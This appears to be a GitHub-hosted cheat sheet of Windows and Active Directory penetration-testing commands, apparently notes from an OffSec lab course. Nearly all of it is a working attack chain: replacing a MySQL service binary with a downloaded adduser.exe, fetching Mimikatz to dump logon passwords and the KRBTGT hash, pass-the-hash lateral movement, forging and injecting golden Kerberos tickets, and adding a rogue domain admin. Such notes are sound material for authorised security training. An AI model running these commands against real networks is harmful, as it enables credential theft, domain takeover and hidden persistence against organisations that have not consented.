-
Notifications
You must be signed in to change notification settings - Fork 51
/
Copy pathWindows Pentesting with OffSec
80 lines (60 loc) · 2.47 KB
/
Windows Pentesting with OffSec
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
# RDP connections
xfreerdp /u:username /p:password /d:domain-name /v:IP-address /w:1920 /h:1080 /fonts /smart-sizing
# Initial enum commands
hostname
whoami
whoami /groups
net user
# Enumeration running services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartName | Where-Object {$_.State -like 'Running'}
# Service binary enumeration
icacls "C:\xampp\apache\bin\httpd.exe"
icalcs "C:\xampp\mysql\bin\mysqld.exe"
# Enumerate specific service
Get-CimInstance -ClassName Win32_Service -Filter "Name='mysql'" | Select-Object StartMode
# Compile adduser.c and configure web server
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
python3 -m http.server 80
# Download binary, move it, verify user
iwr -uri http://192.168.x.xx/adduser.exe -OutFile adduser.exe
move C:\xampp\mysql\bin\mysqld.exe mysqld_backup.exe
move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe
net user
# Restarting service
net stop mysql (fails)
Get-CimInstance -ClassName Win32_Service -Filter "Name='mysql'" | Select-Object StartMode
Restart-Computer -WhatIf (or whoami /priv)
Restart-Computer
# Download Mimikatz, dump credentials
iwr -uri http://192.168.1.47/mimikatz.exe -OutFile mimikatz.exe
mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords
# Lateral movement 1
/usr/bin/impacket-wmiexec -hashes :a57b67b0bfe5dbd258226194f0caf201 corp/[email protected]
# Find PS History
C:\users\jeff\appdata\roaming\microsoft\windows\powershell\psreadline>type ConsoleHost_History.txt
# PsExec to DC
PsExec64.exe \\dc01 cmd.exe
# Golden ticket information - Dump SID and KRBTGT hash (on DC)
PS C:\pentst> .\mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate (DONT NEED THIS)
mimikatz # lsadump::lsa /patch
# Create golden ticket (write to file in this case)
PS C:\Tools> .\mimikatz.exe
mimikatz # kerberos::purge
mimikatz # kerberos::golden /user:michael /domain:http://corp.com /sid:S-1-5-21-424464709-3473652527-2093888899 /krbtgt:4199649f577fc4f18891600906044e88 /ticket:golden
# Super golden ticket
kerberos::golden /user:michael /domain:http://corp.com /sid:S-1-5-21-424464709-3473652527-2093888899 /krbtgt:4199649f577fc4f18891600906044e88 /ticket:corp_super_golden /endin:2147483647
# Inject ticket to memory
C:\Tools> mimikatz.exe
mimikatz # kerberos::ptt golden
# PsExec to DC
PsExec64.exe \\dc01 cmd.exe
# Verify groups
whoami /groups
# Adding a domain admin
net user mighty Password123! /add /domain
net group "domain admins" mighty /add /domain